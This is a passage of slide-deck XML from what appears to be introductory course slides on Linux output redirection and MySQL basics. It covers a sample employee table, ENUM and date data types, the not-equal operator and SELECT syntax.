                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300"/>
                        <a:t>1982-05-02</a:t>
                      </a:r>
                      <a:endParaRPr sz="1300"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="373300">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300"/>
                        <a:t>6</a:t>
                      </a:r>
                      <a:endParaRPr sz="1300"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300"/>
                        <a:t>RANU</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manager</a:t>
                      </a:r>
                      <a:endParaRPr sz="1300"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300"/>
                        <a:t>1</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Accounts</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300"/>
                        <a:t>NewYork</a:t>
                      </a:r>
                      <a:endParaRPr sz="1300"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300"/>
                        <a:t>50000</a:t>
                      </a:r>
                      <a:endParaRPr sz="1300"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300"/>
                        <a:t>2500</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1982-06-06</a:t>
                      </a:r>
                      <a:endParaRPr sz="1300"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="373300">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300"/>
                        <a:t>7</a:t>
                      </a:r>
                      <a:endParaRPr sz="1300"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300"/>
                        <a:t>Abhishek</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manager</a:t>
                      </a:r>
                      <a:endParaRPr sz="1300"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300"/>
                        <a:t>3</a:t>
                      </a:r>
                      <a:endParaRPr sz="1300"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>HR</a:t>
                      </a:r>
                      <a:endParaRPr sz="1300"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300"/>
                        <a:t>Sidney</a:t>
                      </a:r>
                      <a:endParaRPr sz="1300"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300"/>
                        <a:t>40000</a:t>
                      </a:r>
                      <a:endParaRPr sz="1300"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300"/>
                        <a:t>3500</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1990-01-01</a:t>
                      </a:r>
                      <a:endParaRPr sz="1300"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="373300">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300"/>
                        <a:t>8</a:t>
                      </a:r>
                      <a:endParaRPr sz="1300"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300"/>
                        <a:t>Aashish</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manager</a:t>
                      </a:r>
                      <a:endParaRPr sz="1300"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300"/>
                        <a:t>4</a:t>
                      </a:r>
                      <a:endParaRPr sz="1300"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300"/>
                        <a:t>Finance</a:t>
                      </a:r>
                      <a:endParaRPr sz="1300"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300"/>
                        <a:t>Mosco</a:t>
                      </a:r>
                      <a:endParaRPr sz="1300"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300"/>
                        <a:t>45000</a:t>
                      </a:r>
                      <a:endParaRPr sz="1300"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1300"/>
                        <a:t>100</a:t>
                      </a:r>
                      <a:endParaRPr sz="13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1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>1995-08-26</a:t>
                      </a:r>
                      <a:endParaRPr sz="1300"/>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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="279525" y="417175"/>
            <a:ext cx="875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a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Input Output Redirection in Linux</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="376" name="Google Shape;376;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827325" y="1032625"/>
            <a:ext cx="7659600" cy="32865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 sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Single bracket </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>'&gt;'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> or double bracket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> '&gt;&gt;'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> can be used to redirect standard output.</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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484"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="959975" y="1270675"/>
            <a:ext cx="7316100" cy="350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sz="4100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ENUM(val1, val2, val3, ...)</a:t>
            </a:r>
            <a:endParaRPr sz="4100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2985" name="Google Shape;2985;p484"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1047775" y="1065000"/>
            <a:ext cx="7316100" cy="557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4000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Enumerated Data Type</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="6100">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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p485"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1324650" y="2046925"/>
            <a:ext cx="6905400" cy="2978100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-488950" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="4100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="4100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>manager</a:t>
            </a:r>
            <a:endParaRPr sz="4100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-488950" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="4100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="4100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>clerk</a:t>
            </a:r>
            <a:endParaRPr sz="4100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-488950" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="4100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="4100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>analyst</a:t>
            </a:r>
            <a:endParaRPr sz="4100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-488950" lvl="0" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="4100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="4100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>salesmen</a:t>
            </a:r>
            <a:endParaRPr sz="4100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2991" name="Google Shape;2991;p485"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913950" y="1489825"/>
            <a:ext cx="7316100" cy="557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4000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Job/Role possible values</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="6100">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2992" name="Google Shape;2992;p485"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1047775" y="303000"/>
            <a:ext cx="7316100" cy="557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4000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Enumerated Data Type</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="6100">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>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sp>
        <p:nvSpPr>
          <p:cNvPr id="2997" name="Google Shape;2997;p486"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1059450" y="809825"/>
            <a:ext cx="73161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700">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MySQL Date </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="4700">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Data Type</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4700">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2998" name="Google Shape;2998;p486"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="604500" y="1979625"/>
            <a:ext cx="8179500" cy="154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100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>YYYY-MM-DD HH:MM:SS</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="5100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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2" name="Shape 3002"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3003" name="Google Shape;3003;p487"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="382925" y="1831075"/>
            <a:ext cx="8179500" cy="1857600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-552450" lvl="0" marL="457200" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="5100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="5100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;&gt; </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="5100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-552450" lvl="0" marL="457200" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="5100"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="5100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>!=</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="5100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3004" name="Google Shape;3004;p487"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="985150" y="930475"/>
            <a:ext cx="7539000" cy="81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900">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Not Equal To Operator</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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pic>
        <p:nvPicPr>
          <p:cNvPr id="3009" name="Google Shape;3009;p488"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="26336" l="22863" r="22530" t="11210"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1788825" y="177225"/>
            <a:ext cx="6252400" cy="4782651"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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sp>
        <p:nvSpPr>
          <p:cNvPr id="3014" name="Google Shape;3014;p489"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="531475" y="1626825"/>
            <a:ext cx="8179500" cy="25347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3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>column1, column2, ...</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>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rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84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lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
